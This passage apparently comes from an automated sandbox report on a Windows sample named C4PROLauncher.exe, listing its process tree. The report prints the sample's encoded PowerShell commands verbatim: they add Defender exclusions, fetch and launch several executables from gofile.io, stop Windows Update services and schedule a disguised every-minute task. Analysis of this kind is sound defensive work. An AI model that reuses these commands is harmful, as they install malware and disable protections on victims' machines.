    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1932 --field-trial-handle=1732,i,18268270093730465290,17718310205085392215,131072 /prefetch:8
    3⤵
    PID:4160
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2088 --field-trial-handle=1732,i,18268270093730465290,17718310205085392215,131072 /prefetch:8
    3⤵
    PID:4792
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3084 --field-trial-handle=1732,i,18268270093730465290,17718310205085392215,131072 /prefetch:1
    3⤵
    PID:2872
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3088 --field-trial-handle=1732,i,18268270093730465290,17718310205085392215,131072 /prefetch:1
    3⤵
    PID:3128
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4328 --field-trial-handle=1732,i,18268270093730465290,17718310205085392215,131072 /prefetch:1
    3⤵
    PID:3160
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4812 --field-trial-handle=1732,i,18268270093730465290,17718310205085392215,131072 /prefetch:8
    3⤵
    PID:4420
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4976 --field-trial-handle=1732,i,18268270093730465290,17718310205085392215,131072 /prefetch:8
    3⤵
    PID:4132
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3464 --field-trial-handle=1732,i,18268270093730465290,17718310205085392215,131072 /prefetch:1
    3⤵
    PID:4496
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3108 --field-trial-handle=1732,i,18268270093730465290,17718310205085392215,131072 /prefetch:1
    3⤵
    PID:1712
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5872 --field-trial-handle=1732,i,18268270093730465290,17718310205085392215,131072 /prefetch:8
    3⤵
    PID:328
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5004 --field-trial-handle=1732,i,18268270093730465290,17718310205085392215,131072 /prefetch:1
    3⤵
    PID:2456
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3304 --field-trial-handle=1732,i,18268270093730465290,17718310205085392215,131072 /prefetch:1
    3⤵
    PID:4044
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4528 --field-trial-handle=1732,i,18268270093730465290,17718310205085392215,131072 /prefetch:1
    3⤵
    PID:5052
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2332 --field-trial-handle=1732,i,18268270093730465290,17718310205085392215,131072 /prefetch:8
    3⤵
    PID:4104
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=2448 --field-trial-handle=1732,i,18268270093730465290,17718310205085392215,131072 /prefetch:1
    3⤵
    PID:1108
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5984 --field-trial-handle=1732,i,18268270093730465290,17718310205085392215,131072 /prefetch:8
    3⤵
    PID:2288
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6132 --field-trial-handle=1732,i,18268270093730465290,17718310205085392215,131072 /prefetch:8
    3⤵
    PID:3012
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4516 --field-trial-handle=1732,i,18268270093730465290,17718310205085392215,131072 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2808
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap4470:88:7zEvent51
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:2944
- C:\Users\Admin\Downloads\C4PROLauncher.exe
  "C:\Users\Admin\Downloads\C4PROLauncher.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  PID:4148
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
    3⤵
    PID:3472
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3876
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcwBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABtAGoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQB3AHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdABvAHIAZQA0AC4AZwBvAGYAaQBsAGUALgBpAG8ALwBkAG8AdwBuAGwAbwBhAGQALwBkAGkAcgBlAGMAdAAvAGEANABiAGMANAA3AGUAMQAtAGYANQBiAGUALQA0AGUANAA4AC0AOABhADUAZgAtADgANQA4ADIAOQA5AGMAMwAwAGYANwBjAC8AMQAuAGUAeABlACcALAAgADwAIwByAGsAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHUAZwB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGgAaQBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEALgBlAHgAZQAnACkAKQA8ACMAdgBtAGIAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AcwB0AG8AcgBlADUALgBnAG8AZgBpAGwAZQAuAGkAbwAvAGQAbwB3AG4AbABvAGEAZAAvAGQAaQByAGUAYwB0AC8AYQA4AGYANwAwAGYAYQA2AC0AMAA0AGEAZAAtADQAMgA5AGIALQBhADQAYgA1AC0AYwA3AGUAMgAxAGYAYQBhAGEAMQAwAGQALwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACwAIAA8ACMAZQBtAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBtAGQAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwByAHoAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAKQA8ACMAcwBmAHAAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AcwB0AG8AcgBlADEAMAAuAGcAbwBmAGkAbABlAC4AaQBvAC8AZABvAHcAbgBsAG8AYQBkAC8AZABpAHIAZQBjAHQALwBhADYAMwBjADQANQBjAGQALQA3AGIAOQAwAC0ANAA5AGUAMgAtAGIANQAyAGMALQBjADYAMwBhADQAMQAwADkAMQAyAGMAYgAvAEEAZAB2AGEAbgBjAGUAZABEAGUAZgBlAG4AZABlAHIALgBlAHgAZQAnACwAIAA8ACMAeABxAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AHgAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBjAHkAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAGQAdgBhAG4AYwBlAGQARABlAGYAZQBuAGQAZQByAC4AZQB4AGUAJwApACkAPAAjAHoAcwBhACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdABvAHIAZQA1AC4AZwBvAGYAaQBsAGUALgBpAG8ALwBkAG8AdwBuAGwAbwBhAGQALwBkAGkAcgBlAGMAdAAvAGQAOQBhADgAYwA4ADYANQAtAGMANgBlAGUALQA0ADEANQA3AC0AOABmADcAYQAtADYAMAAyADUANABmADcAMwBhADIANAAzAC8AUwB5AHMAQQBwAHAALgBlAHgAZQAnACwAIAA8ACMAcABjAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBtAHYAYQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB3AHoAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQApADwAIwB6AHAAZgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGMAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBwAGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAuAGUAeABlACcAKQA8ACMAYQBsAHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdQBiAGUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHEAcwBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQA8ACMAbABmAHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABtAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAaABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAZAB2AGEAbgBjAGUAZABEAGUAZgBlAG4AZABlAHIALgBlAHgAZQAnACkAPAAjAHAAcQBqACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHoAaAB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AG4AZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAcABwAGIAIwA+AA=="
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    PID:668
  - - C:\Users\Admin\AppData\Local\Temp\1.exe
      "C:\Users\Admin\AppData\Local\Temp\1.exe"
      4⤵
      Executes dropped EXE
      PID:2968
  - - C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
      "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
      4⤵
      Executes dropped EXE
      PID:2648
  - - C:\Users\Admin\AppData\Local\Temp\AdvancedDefender.exe
      "C:\Users\Admin\AppData\Local\Temp\AdvancedDefender.exe"
      4⤵
      Modifies WinLogon for persistence
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      PID:5104
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
        5⤵
        
        PID:2900
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3580
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Drops file in Drivers directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:716
  - - C:\Users\Admin\AppData\Local\Temp\SysApp.exe
      "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:2200
    - - C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:984
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2616
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4768
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:3944
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:444
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4952
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:800
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1784
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2008
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1956
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:848
- C:\Users\Admin\Downloads\C4PROLauncher.exe
  "C:\Users\Admin\Downloads\C4PROLauncher.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  PID:3764
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
    3⤵
    PID:1316
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:1736
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
      4⤵
      PID:3704
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcwBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABtAGoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQB3AHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdABvAHIAZQA0AC4AZwBvAGYAaQBsAGUALgBpAG8ALwBkAG8AdwBuAGwAbwBhAGQALwBkAGkAcgBlAGMAdAAvAGEANABiAGMANAA3AGUAMQAtAGYANQBiAGUALQA0AGUANAA4AC0AOABhADUAZgAtADgANQA4ADIAOQA5AGMAMwAwAGYANwBjAC8AMQAuAGUAeABlACcALAAgADwAIwByAGsAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHUAZwB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGgAaQBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEALgBlAHgAZQAnACkAKQA8ACMAdgBtAGIAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AcwB0AG8AcgBlADUALgBnAG8AZgBpAGwAZQAuAGkAbwAvAGQAbwB3AG4AbABvAGEAZAAvAGQAaQByAGUAYwB0AC8AYQA4AGYANwAwAGYAYQA2AC0AMAA0AGEAZAAtADQAMgA5AGIALQBhADQAYgA1AC0AYwA3AGUAMgAxAGYAYQBhAGEAMQAwAGQALwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACwAIAA8ACMAZQBtAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBtAGQAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwByAHoAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAKQA8ACMAcwBmAHAAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AcwB0AG8AcgBlADEAMAAuAGcAbwBmAGkAbABlAC4AaQBvAC8AZABvAHcAbgBsAG8AYQBkAC8AZABpAHIAZQBjAHQALwBhADYAMwBjADQANQBjAGQALQA3AGIAOQAwAC0ANAA5AGUAMgAtAGIANQAyAGMALQBjADYAMwBhADQAMQAwADkAMQAyAGMAYgAvAEEAZAB2AGEAbgBjAGUAZABEAGUAZgBlAG4AZABlAHIALgBlAHgAZQAnACwAIAA8ACMAeABxAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AHgAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBjAHkAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAGQAdgBhAG4AYwBlAGQARABlAGYAZQBuAGQAZQByAC4AZQB4AGUAJwApACkAPAAjAHoAcwBhACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdABvAHIAZQA1AC4AZwBvAGYAaQBsAGUALgBpAG8ALwBkAG8AdwBuAGwAbwBhAGQALwBkAGkAcgBlAGMAdAAvAGQAOQBhADgAYwA4ADYANQAtAGMANgBlAGUALQA0ADEANQA3AC0AOABmADcAYQAtADYAMAAyADUANABmADcAMwBhADIANAAzAC8AUwB5AHMAQQBwAHAALgBlAHgAZQAnACwAIAA8ACMAcABjAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBtAHYAYQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB3AHoAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQApADwAIwB6AHAAZgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGMAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBwAGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAuAGUAeABlACcAKQA8ACMAYQBsAHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdQBiAGUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHEAcwBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQA8ACMAbABmAHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABtAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAaABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAZAB2AGEAbgBjAGUAZABEAGUAZgBlAG4AZABlAHIALgBlAHgAZQAnACkAPAAjAHAAcQBqACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHoAaAB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AG4AZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAcABwAGIAIwA+AA=="
    3⤵
    - Blocklisted process makes network request
    PID:4872
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:1756
  - - C:\Users\Admin\AppData\Local\Temp\1.exe
      "C:\Users\Admin\AppData\Local\Temp\1.exe"
      4⤵
      Executes dropped EXE
      PID:3592
  - - C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
      "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
      4⤵
      Executes dropped EXE
      PID:4084
  - - C:\Users\Admin\AppData\Local\Temp\AdvancedDefender.exe
      "C:\Users\Admin\AppData\Local\Temp\AdvancedDefender.exe"
      4⤵
      Modifies WinLogon for persistence
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:1188
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
        5⤵
        
        PID:4984
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2968
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
        6⤵
        
        PID:1032
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Drops file in Drivers directory
        Suspicious use of SetThreadContext
        
        PID:2656
  - - C:\Users\Admin\AppData\Local\Temp\SysApp.exe
      "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
